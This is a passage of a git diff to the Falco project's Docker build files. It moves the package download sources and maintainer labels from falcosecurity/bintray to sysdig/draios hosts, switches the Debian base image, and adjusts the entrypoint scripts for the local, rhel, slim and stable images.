+LABEL maintainer="opensource@sysdig.com"
+COPY --from=build /etc/ssl/certs/ca-certificates.crt /etc/ssl/certs/ca-certificates.crt
+COPY --from=build /falcoctl/falcoctl /falcoctl
+CMD ["/falcoctl", "install", "probe"]

docker/local/Dockerfile

@@ -1,7 +1,7 @@
-FROM debian:stable
+FROM debian:unstable
 
 LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG FALCO_VERSION=
 RUN test -n FALCO_VERSION
@@ -13,82 +13,84 @@ ENV HOME /root
 
 RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
-RUN apt-get update \
-	&& apt-get install -y --no-install-recommends \
-	bash-completion \
-	bc \
-	clang-7 \
-	ca-certificates \
-	curl \
-	dkms \
-	gnupg2 \
-	gcc \
-	jq \
-	libc6-dev \
-	libelf-dev \
-	libyaml-0-2 \
-	llvm-7 \
-	netcat \
-	xz-utils \
-	libmpc3 \
-	binutils \
-	libgomp1 \
-	libitm1 \
-	libatomic1 \
-	liblsan0 \
-	libtsan0 \
-	libmpx2 \
-	libquadmath0 \
-	libcc1-0 \
-	&& rm -rf /var/lib/apt/lists/*
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
 
-# gcc 6 is no longer included in debian stable, but we need it to
+RUN apt-get update \
+    && apt-get install -y --no-install-recommends \
+    bash-completion \
+    bc \
+    clang-7 \
+    ca-certificates \
+    curl \
+    dkms \
+    gnupg2 \
+    gcc \
+    jq \
+    libc6-dev \
+    libelf-dev \
+    libyaml-0-2 \
+    llvm-7 \
+    netcat \
+    xz-utils \
+    libmpc3 \
+    binutils \
+    libgomp1 \
+    libitm1 \
+    libatomic1 \
+    liblsan0 \
+    libtsan0 \
+    libmpx2 \
+    libquadmath0 \
+    libcc1-0 \
+    && rm -rf /var/lib/apt/lists/*
+
+# gcc 6 is no longer included in debian unstable, but we need it to
 # build kernel modules on the default debian-based ami used by
 # kops. So grab copies we've saved from debian snapshots with the
 # prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
 # or so.
 
-RUN curl -L -o cpp-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-6_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6-base_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6-base_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6_6.3.0-18_amd64.deb \
-	&& curl -L -o libasan3_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libasan3_6.3.0-18_amd64.deb \
-	&& curl -L -o libcilkrts5_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libcilkrts5_6.3.0-18_amd64.deb \
-	&& curl -L -o libgcc-6-dev_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-6-dev_6.3.0-18_amd64.deb \
-	&& curl -L -o libubsan0_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libubsan0_6.3.0-18_amd64.deb \
-	&& curl -L -o libmpfr4_3.1.3-2_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpfr4_3.1.3-2_amd64.deb \
-	&& curl -L -o libisl15_0.18-1_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-1_amd64.deb \
-	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
-	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
+RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
+    && curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
+    && curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
+    && curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
+    && curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
+    && curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
+    && curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
+    && curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
+    && curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
+    && dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
+    && rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
 
-# gcc 5 is no longer included in debian stable, but we need it to
+# gcc 5 is no longer included in debian unstable, but we need it to
 # build centos kernels, which are 3.x based and explicitly want a gcc
 # version 3, 4, or 5 compiler. So grab copies we've saved from debian
 # snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
 
-RUN curl -L -o cpp-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-5_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5-base_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5_5.5.0-12_amd64.deb \
-	&& curl -L -o libasan2_5.5.0-12_amd64.deb	https://dl.bintray.com/falcosecurity/dependencies/libasan2_5.5.0-12_amd64.deb \
-	&& curl -L -o libgcc-5-dev_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
-	&& curl -L -o libisl15_0.18-4_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-4_amd64.deb \
-	&& curl -L -o libmpx0_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpx0_5.5.0-12_amd64.deb \
-	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
-	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
+RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
+    && curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+    && curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
+    && curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
+    && curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+    && curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
+    && curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
+    && dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
+    && rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
 
 # Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
 # default to gcc-5.
 RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
 
 RUN rm -rf /usr/bin/clang \
-	&& rm -rf /usr/bin/llc \
-	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
-	&& ln -s /usr/bin/llc-7 /usr/bin/llc
+    && rm -rf /usr/bin/llc \
+    && ln -s /usr/bin/clang-7 /usr/bin/clang \
+    && ln -s /usr/bin/llc-7 /usr/bin/llc
 
 # Some base images have an empty /lib/modules by default
 # If it's not empty, docker build will fail instead of
 # silently overwriting the existing directory
 RUN rm -df /lib/modules \
-	&& ln -s $HOST_ROOT/lib/modules /lib/modules
+    && ln -s $HOST_ROOT/lib/modules /lib/modules
 
 ADD falco-${FALCO_VERSION}-x86_64.deb /
 RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
@@ -98,15 +100,15 @@ RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
 RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
     && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
 
-# debian:stable head contains binutils 2.31, which generates
+# debian:unstable head contains binutils 2.31, which generates
 # binaries that are incompatible with kernels < 4.16. So manually
 # forcibly install binutils 2.30-22 instead.
-RUN curl -L -o binutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils_2.30-22_amd64.deb \
-	&& curl -L -o libbinutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libbinutils_2.30-22_amd64.deb \
-	&& curl -L -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
-	&& curl -L -o binutils-common_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-common_2.30-22_amd64.deb \
-	&& dpkg -i *binutils*.deb \
-	&& rm -f *binutils*.deb
+RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
+    && curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
+    && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+    && curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
+    && dpkg -i *binutils*.deb \
+    && rm -f *binutils*.deb
 
 # The local container also copies some test trace files and
 # corresponding rules that are used when running regression tests.

docker/local/docker-entrypoint.sh

@@ -25,11 +25,10 @@ if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
 
     for i in "$HOST_ROOT/usr/src"/*
     do
-        base=$(basename "$i")
-        ln -s "$i" "/usr/src/$base"
+        ln -s "$i" "/usr/src/$i"
     done
 
-    /usr/bin/falco-driver-loader
+    /usr/bin/falco-probe-loader
 fi
 
-exec "$@"
+exec "$@"

docker/minimal/Dockerfile

@@ -1,20 +1,20 @@
 FROM ubuntu:18.04 as ubuntu
 
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
-ARG FALCO_VERSION
-ARG VERSION_BUCKET=bin
+ARG FALCO_VERSION=0.19.0
 
 ENV FALCO_VERSION=${FALCO_VERSION}
-ENV VERSION_BUCKET=${VERSION_BUCKET}
 
 WORKDIR /
 
-ADD https://bintray.com/api/ui/download/falcosecurity/${VERSION_BUCKET}/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
+ADD https://s3.amazonaws.com/download.draios.com/stable/tgz/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
 
-RUN apt-get update -y && \
+# ADD will download from URL and unntar
+RUN apt-get update && \
     apt-get install -y libyaml-0-2 binutils && \
-    tar -xvf falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    # curl -O https://s3.amazonaws.com/download.draios.com/stable/tgz/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    tar xfzv falco-${FALCO_VERSION}-x86_64.tar.gz && \
     rm -f falco-${FALCO_VERSION}-x86_64.tar.gz && \
     mv falco-${FALCO_VERSION}-x86_64 falco && \
     strip falco/usr/bin/falco && \

docker/rhel/Dockerfile

@@ -0,0 +1,38 @@
+FROM registry.access.redhat.com/rhel7
+
+LABEL maintainer="opensource@sysdig.com"
+
+### Atomic/OpenShift Labels - https://github.com/projectatomic/ContainerApplicationGenericLabels
+LABEL name="falco" \
+    vendor="falcosecurity" \
+    url="http://falco.org/" \
+    summary="Container native runtime security" \
+    description="Falco is an open source project for intrusion and abnormality detection for Cloud Native platforms." \
+    run='docker run -d --name falco --restart always --privileged --net host --pid host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc:ro --shm-size=350m registry.connect.redhat.com/sysdig/falco'
+
+COPY help.md /tmp/
+
+ENV HOST_ROOT /host
+ENV HOME /root
+
+ADD http://download.draios.com/stable/rpm/draios.repo /etc/yum.repos.d/draios.repo
+RUN rpm --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public && \
+    rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm && \
+    yum clean all && \
+    REPOLIST=rhel-7-server-rpms,rhel-7-server-optional-rpms,epel,draios \
+    INSTALL_PKGS="gcc dkms kernel-devel kernel-headers python golang-github-cpuguy83-go-md2man falco" && \
+    yum -y update-minimal --disablerepo "*" --enablerepo ${REPOLIST} --setopt=tsflags=nodocs \
+    --security --sec-severity=Important --sec-severity=Critical && \
+    yum -y install --disablerepo "*" --enablerepo ${REPOLIST} --setopt=tsflags=nodocs ${INSTALL_PKGS} && \
+    ### help file markdown to man conversion
+    go-md2man -in /tmp/help.md -out /help.1 && \
+    ### we delete everything on /usr/src/kernels otherwise it messes up docker-entrypoint.sh
+    rm -fr /usr/src/kernels && \
+    rm -df /lib/modules && ln -s $HOST_ROOT/lib/modules /lib/modules && \
+    yum clean all
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
+
+CMD ["/usr/bin/falco"]

docker/rhel/docker-entrypoint.sh

@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+# set -e
+
+# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
+
+if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
+    echo "* Setting up /usr/src links from host"
+
+    for i in "$HOST_ROOT/usr/src"/*
+    do
+        ln -s "$i" "/usr/src/$i"
+    done
+
+    /usr/bin/falco-probe-loader
+fi
+
+exec "$@"

docker/rhel/help.md

@@ -0,0 +1,15 @@
+% falco (1) Container Image Pages
+% Falco Team
+% June, 2017
+
+# NAME
+falco \- Container Native runtime security
+
+# DESCRIPTION
+Falco is an open source project for intrusion and abnormality detection for Cloud Native platforms. See Falco website for more information: http://falco.org/
+
+# EXAMPLE
+    docker run -d --name falco --restart always --privileged --net host --pid host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc:ro --shm-size=350m registry.connect.redhat.com/sysdig/falco
+
+# AUTHORS
+Falco Team

docker/slim-dev/Dockerfile

@@ -1,36 +1,35 @@
 FROM ubuntu:18.04
 
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
-LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name <name> <image>"
+ENV FALCO_REPOSITORY dev
 
-ARG FALCO_VERSION=latest
-ARG VERSION_BUCKET=deb
-
-ENV FALCO_VERSION=${FALCO_VERSION}
-ENV VERSION_BUCKET=${VERSION_BUCKET}
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
 
 ENV HOST_ROOT /host
+
 ENV HOME /root
 
 RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
 RUN apt-get update \
   && apt-get install -y --no-install-recommends \
-  # bash-completion \
-  # bc \
+  # 	bash-completion \
+  # 	bc \
   ca-certificates \
   curl \
   gnupg2 \
   jq \
-  # netcat \
-  # xz-utils \
+  # 	netcat \
+  # 	xz-utils \
   && rm -rf /var/lib/apt/lists/*
 
-RUN curl -s https://falco.org/repo/falcosecurity-3672BA8F.asc | apt-key add - \
-  && echo "deb https://dl.bintray.com/falcosecurity/${VERSION_BUCKET} stable main" | tee -a /etc/apt/sources.list.d/falcosecurity.list \
-  && apt-get update -y \
-  && if [ "$FALCO_VERSION" = "latest" ]; then apt-get install -y --no-install-recommends falco; else apt-get install -y --no-install-recommends falco=${FALCO_VERSION}; fi \
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
+  && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+  && apt-get update \
+  && apt-get install -y --no-install-recommends falco \
   && apt-get clean \
   && rm -rf /var/lib/apt/lists/*
 
@@ -45,4 +44,7 @@ RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/fa
 RUN rm -df /lib/modules \
   && ln -s $HOST_ROOT/lib/modules /lib/modules
 
+#COPY ./entrypoint.sh /
+# ENTRYPOINT ["/entrypoint.sh"]
+
 CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

docker/slim-stable/Dockerfile

@@ -0,0 +1,50 @@
+FROM ubuntu:18.04
+
+LABEL maintainer="opensource@sysdig.com"
+
+ENV FALCO_REPOSITORY stable
+
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+
+ENV HOST_ROOT /host
+
+ENV HOME /root
+
+RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
+
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
+RUN apt-get update \
+  && apt-get install -y --no-install-recommends \
+  # 	bash-completion \
+  # 	bc \
+  ca-certificates \
+  curl \
+  gnupg2 \
+  jq \
+  # 	netcat \
+  # 	xz-utils \
+  && rm -rf /var/lib/apt/lists/*
+
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
+  && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
+  && apt-get update \
+  && apt-get install -y --no-install-recommends falco \
+  && apt-get clean \
+  && rm -rf /var/lib/apt/lists/*
+
+# Change the falco config within the container to enable ISO 8601
+# output.
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
+  && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+
+# Some base images have an empty /lib/modules by default
+# If it's not empty, docker build will fail instead of
+# silently overwriting the existing directory
+RUN rm -df /lib/modules \
+  && ln -s $HOST_ROOT/lib/modules /lib/modules
+
+#COPY ./entrypoint.sh /
+# ENTRYPOINT ["/entrypoint.sh"]
+
+CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

docker/stable/Dockerfile

@@ -1,19 +1,19 @@
-FROM debian:stable
+FROM debian:unstable
 
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
-LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
+ENV FALCO_REPOSITORY stable
 
-ARG FALCO_VERSION=latest
-ARG VERSION_BUCKET=deb
-ENV VERSION_BUCKET=${VERSION_BUCKET}
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
 
-ENV FALCO_VERSION=${FALCO_VERSION}
 ENV HOST_ROOT /host
+
 ENV HOME /root
 
 RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
 RUN apt-get update \
 	&& apt-get install -y --no-install-recommends \
 	bash-completion \
@@ -33,36 +33,36 @@ RUN apt-get update \
 	xz-utils \
 	&& rm -rf /var/lib/apt/lists/*
 
-# gcc 6 is no longer included in debian stable, but we need it to
+# gcc 6 is no longer included in debian unstable, but we need it to
 # build kernel modules on the default debian-based ami used by
 # kops. So grab copies we've saved from debian snapshots with the
 # prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
 # or so.
 
-RUN curl -L -o cpp-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-6_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6-base_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6-base_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6_6.3.0-18_amd64.deb \
-	&& curl -L -o libasan3_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libasan3_6.3.0-18_amd64.deb \
-	&& curl -L -o libcilkrts5_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libcilkrts5_6.3.0-18_amd64.deb \
-	&& curl -L -o libgcc-6-dev_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-6-dev_6.3.0-18_amd64.deb \
-	&& curl -L -o libubsan0_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libubsan0_6.3.0-18_amd64.deb \
-	&& curl -L -o libmpfr4_3.1.3-2_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpfr4_3.1.3-2_amd64.deb \
-	&& curl -L -o libisl15_0.18-1_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-1_amd64.deb \
+RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
+	&& curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
+	&& curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
+	&& curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
+	&& curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
+	&& curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
+	&& curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
+	&& curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
 	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
 	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
 
-# gcc 5 is no longer included in debian stable, but we need it to
+# gcc 5 is no longer included in debian unstable, but we need it to
 # build centos kernels, which are 3.x based and explicitly want a gcc
 # version 3, 4, or 5 compiler. So grab copies we've saved from debian
 # snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
 
-RUN curl -L -o cpp-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-5_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5-base_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5_5.5.0-12_amd64.deb \
-	&& curl -L -o libasan2_5.5.0-12_amd64.deb	https://dl.bintray.com/falcosecurity/dependencies/libasan2_5.5.0-12_amd64.deb \
-	&& curl -L -o libgcc-5-dev_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
-	&& curl -L -o libisl15_0.18-4_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-4_amd64.deb \
-	&& curl -L -o libmpx0_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpx0_5.5.0-12_amd64.deb \
+RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
